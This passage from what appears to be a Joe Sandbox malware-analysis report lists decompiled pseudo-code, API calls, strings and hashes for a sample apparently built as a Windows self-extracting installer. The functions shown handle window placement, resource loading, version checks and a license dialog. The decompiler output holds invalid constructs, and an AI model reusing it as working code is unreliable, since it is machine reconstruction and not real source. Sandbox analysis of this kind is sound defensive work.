					 *_t65 = _t17;
				}
				return E01066CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x01062aac
0x01062ab7
0x01062abc
0x01062abe
0x01062ac3
0x01062ac6
0x01062ac9
0x01062ace
0x01062ae6
0x01062bdc
0x01062bdc
0x01062be0
0x00000000
0x00000000
0x01062af2
0x01062afc
0x01062b00
0x01062b05
0x01062b05
0x01062b0b
0x01062bca
0x01062bd1
0x01062b11
0x01062b18
0x01062b26
0x01062b99
0x01062bc8
0x00000000
0x00000000
0x01062b9b
0x01062bae
0x01062bb3
0x01062bb5
0x01062bb5
0x01062bb8
0x01062bb8
0x01062bba
0x01062bbb
0x00000000
0x01062bb8
0x01062b28
0x01062b2e
0x01062b33
0x01062b39
0x01062b3c
0x01062b3c
0x01062b3e
0x01062b3f
0x01062b55
0x01062b5d
0x01062b64
0x01062b64
0x01062b7a
0x01062b7f
0x01062b81
0x01062b81
0x01062b84
0x01062b84
0x01062b86
0x01062b87
0x01062bbf
0x01062bc1
0x01062bc1
0x01062b26
0x01062bda
0x01062bda
0x01062be6
0x01062be6
0x01062bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 01062AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 01062AF2
CharNextA.USER32(?), ref: 01062B12
CharUpperA.USER32 ref: 01062B1E
CharPrevA.USER32(?,?), ref: 01062B55
CharNextA.USER32(?), ref: 01062BD4

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 8d6be79d86971c33490714cd2a5cebf6c0c74f088f5cc8fce406dab3cee393e7
Instruction ID: 75af56031f99a468eb82f1dc5ca3b477290488c0c4cc9efed560a628c740f9fb
Opcode Fuzzy Hash: 8d6be79d86971c33490714cd2a5cebf6c0c74f088f5cc8fce406dab3cee393e7
Instruction Fuzzy Hash: 914118346042459FDB66AF389854AFD7FADDF56350F0400DAD8C297202DB7A5A46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010643D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E010643D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x1068004; // 0x19e58fb5
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E01066CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x010643d0
0x010643d8
0x010643df
0x010643e6
0x010643ec
0x010643f1
0x01064400
0x01064403
0x0106440b
0x01064420
0x01064429
0x01064437
0x01064444
0x01064447
0x0106444d
0x01064454
0x0106445b
0x01064460
0x01064461
0x01064467
0x0106446f
0x01064473
0x01064473
0x01064463
0x01064463
0x01064463
0x0106447a
0x01064481
0x01064484
0x0106448a
0x01064492
0x01064496
0x01064496
0x01064486
0x01064486
0x01064486
0x010644b8

APIs

GetWindowRect.USER32(?,?), ref: 010643F1
GetWindowRect.USER32(00000000,?), ref: 0106440B
GetDC.USER32(?), ref: 01064423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0106442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0106443A
ReleaseDC.USER32(?,00000000), ref: 01064447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010644A2

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 02d4ba0bcb51e5896852bfe1c2f3877e8a2387358f733ab64872b860dc7e4a10
Instruction ID: a3f0430c43c6330d82028e6d33fd240fd35f7705c6b14e9b55d185b6503c108d
Opcode Fuzzy Hash: 02d4ba0bcb51e5896852bfe1c2f3877e8a2387358f733ab64872b860dc7e4a10
Instruction Fuzzy Hash: B4314B32F00119EFCB14DFB8D9899EEBBB9EB89310F154169F845F7244DA35AC058B60

Uniqueness

Uniqueness Score: -1.00%

Function 01066298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01066298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x1068004; // 0x19e58fb5
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0106171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x1069124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x106a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0106171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E01066CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x01066298
0x010662a0
0x010662a7
0x010662ad
0x010662af
0x010662bb
0x010662c3
0x010662c4
0x0106633b
0x0106633b
0x01066345
0x0106634d
0x00000000
0x00000000
0x010662da
0x010662de
0x0106635f
0x01066369
0x010662e0
0x010662e0
0x010662e0
0x010662e3
0x010662e5
0x010662e5
0x010662e8
0x010662e8
0x010662ea
0x010662eb
0x010662ef
0x010662f1
0x010662f3
0x01066302
0x01066308
0x0106630d
0x01066314
0x01066314
0x01066316
0x01066319
0x01066355
0x01066357
0x0106631b
0x0106631b
0x01066331
0x01066334
0x01066339
0x00000000
0x01066339
0x01066319
0x0106636b
0x0106637d
0x0106637d
0x00000000

APIs

Part of subcall function 0106171E: _vsnprintf.MSVCRT ref: 01061750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 010662CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 010662D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 0106631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 01066345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 01066357

Strings

UPDFILE%lu, xrefs: 010662B3, 01066329

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 806570c2850de5155539cb446c973470a7a70d71c1a29421a4075c4019ae7506
Instruction ID: 58b2172035301b1414c70d6a840df527c45fa5e286077804aa4f922e08d549d2
Opcode Fuzzy Hash: 806570c2850de5155539cb446c973470a7a70d71c1a29421a4075c4019ae7506
Instruction Fuzzy Hash: 0421D675A00229EFDB20AF65DC459FEBB7CFF44714B044159FA82A7201DB3B99068BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0106681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0106681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x1068004; // 0x19e58fb5
				_v8 = _t19 ^ _t44;
				_t41 =  *0x10681d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x10681d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x10681d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x1061140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E010666F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x10681d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E01066CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0106681f
0x0106682a
0x01066831
0x01066836
0x0106683c
0x0106683e
0x01066848
0x01066851
0x0106685d
0x01066864
0x01066876
0x0106693a
0x0106693a
0x0106687c
0x0106687e
0x01066885
0x00000000
0x010668d6
0x010668f4
0x01066900
0x01066902
0x0106690a
0x00000000
0x0106690c
0x0106690c
0x0106691c
0x00000000
0x0106691e
0x01066924
0x0106692b
0x01066932
0x00000000
0x00000000
0x00000000
0x0106692b
0x0106691c
0x0106690a
0x01066885
0x01066876
0x01066951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0106686E
GetSystemMetrics.USER32(0000004A), ref: 010668A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010668CC
RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,?,0000000C), ref: 010668F4
RegCloseKey.ADVAPI32(?), ref: 01066902

Part of subcall function 010666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0106691A), ref: 01066741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 010668C2

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 5af464c08d9ca2f6ae9168f08f4fc81b18c57efb06b78953e2d5d2386ae52c4d
Instruction ID: 6d5fb03170a7206c77baf3ea67d2601976199db37e2c3eab87a3569464ae8877
Opcode Fuzzy Hash: 5af464c08d9ca2f6ae9168f08f4fc81b18c57efb06b78953e2d5d2386ae52c4d
Instruction Fuzzy Hash: DD315231A40318DFDF319B15DC44BEA77BCEB45768F0041E5E989B6240D73699858FA1

Uniqueness

Uniqueness Score: -1.00%

Function 01063A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01063A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0106468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x1068d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0106468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x1068d4c, "<None>") == 0) {
							LocalFree( *0x1068d4c);
							L9:
							 *0x1069124 = 0;
							return 1;
						}
						_t9 = E01066517(_t19, 0x7d1, 0, E01063100, 0, 0);
						LocalFree( *0x1068d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x1069124 = 0x800704c7;
						L2:
						return 0;
					}
					E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x1068d4c);
					 *0x1069124 = 0x80070714;
					goto L2;
				}
				E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x1069124 = E01066285();
				goto L2;
			}

0x01063a46
0x01063a57
0x01063a5d
0x01063a63
0x01063a6a
0x01063a91
0x01063a9a
0x01063ad8
0x01063b13
0x01063b19
0x01063b1b
0x00000000
0x01063b21
0x01063ae7
0x01063af4
0x01063afc
0x00000000
0x00000000
0x01063afe
0x01063a87
0x00000000
0x01063a87
0x01063aa8
0x01063ab3
0x01063ab9
0x00000000
0x01063ab9
0x01063a78
0x01063a82
0x00000000

APIs

Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01062F64,?,00000002,00000000), ref: 01063A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 01063AB3

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285

lstrcmpA.KERNEL32(<None>,00000000), ref: 01063AD0
LocalFree.KERNEL32 ref: 01063B13

Part of subcall function 01066517: FindResourceA.KERNEL32(01060000,000007D6,00000005), ref: 0106652A
Part of subcall function 01066517: LoadResource.KERNEL32(01060000,00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01066538
Part of subcall function 01066517: DialogBoxIndirectParamA.USER32(01060000,00000000,00000547,010619E0,00000000), ref: 01066557
Part of subcall function 01066517: FreeResource.KERNEL32(00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01066560

LocalFree.KERNEL32(00000000,01063100,00000000,00000000), ref: 01063AF4

Strings

<None>, xrefs: 01063AC5
LICENSE, xrefs: 01063A46

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 32b268b848cfeb8e52c2825a2649f8391143a3bf955275622db7d93a1599ab98
Instruction ID: 31b5dd6113b2830a0294c006e5138db3ba366e2f2703b7b0544b00fe06095c83
Opcode Fuzzy Hash: 32b268b848cfeb8e52c2825a2649f8391143a3bf955275622db7d93a1599ab98
Instruction Fuzzy Hash: 06117270700201EBD774BB26AC09E5B7AEDEBE5740B10842EF6C5EE565DA7F880097A4

Uniqueness

Uniqueness Score: -1.00%

Function 010624E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010624E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x1068004; // 0x19e58fb5
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0106658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E01066CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x010624e0
0x010624eb
0x010624f2
0x010624f7
0x01062504
0x0106250e
0x0106251d
0x0106252c
0x01062541
0x01062546
0x01062553
0x01062555
0x01062555
0x01062546
0x0106256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 01062506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0106252C
_lopen.KERNEL32(?,00000040), ref: 0106253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0106254C
_lclose.KERNEL32(00000000), ref: 01062555

Strings

wininit.ini, xrefs: 01062510

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: e833989ecf48d52e4b3a3aa1a53b05acd433356d11c4fd12316c94d2e2bfc787
Instruction ID: c6e75c86597399a737a90b3c78b551b61b4694bcd43e8bf4c20236dab4852ed2
Opcode Fuzzy Hash: e833989ecf48d52e4b3a3aa1a53b05acd433356d11c4fd12316c94d2e2bfc787
Instruction Fuzzy Hash: 26017532700118A7E730AA699C0CEDF7BBCDB95761F000195FA89E3194DE799A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010636EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E010636EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x1068004; // 0x19e58fb5
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x1068184 = 1;
						 *0x1068180 = 1;
						L13:
						 *0x1069a40 = _t119;
						L14:
						__eflags =  *0x1068a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E01062A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E01062A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x1068a38 & 0x00000001;
											if(( *0x1068a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lega");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0106681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E010667C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E010628E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x1069a40 = _t119;
						 *0x1068184 = 1;
						 *0x1068180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x1069a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x1068184 = _t135;
							 *0x1068180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
